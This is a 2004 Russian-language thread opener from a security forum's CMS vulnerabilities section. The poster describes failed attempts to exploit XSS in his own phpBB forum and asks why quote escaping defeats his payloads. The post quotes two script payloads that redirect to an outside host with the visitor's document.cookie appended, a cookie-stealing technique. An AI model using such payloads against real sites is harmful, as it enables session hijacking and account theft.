HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Эксперимент с xss, на форуме phpBB
  #1  
Старый 30.10.2004, 00:46
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 194
С нами: 11393666

Репутация: 47
По умолчанию Эксперимент с xss, на форуме phpBB

Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;http://www.asd.as/as.php?xack=&quot;+docu...lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&a mp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie &lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
 
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Накрутка госований в форумах phpbb Koller Уязвимости CMS / форумов 16 13.01.2006 17:36
phpBB <=2.0.18 "Login Dictionnary Attack" néM3S!s Forum for discussion of ANTICHAT 9 28.12.2005 17:27
Очередные дыры: phpBB 2.0.14 rsha1988 Уязвимости CMS / форумов 8 08.05.2005 18:48
Эксперимент с Warn FixSlader Болталка 9 28.04.2005 11:22
Как узнать пароль на форуме phpBB <=2.0.10 ? Evgeny Уязвимости CMS / форумов 6 26.11.2004 22:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.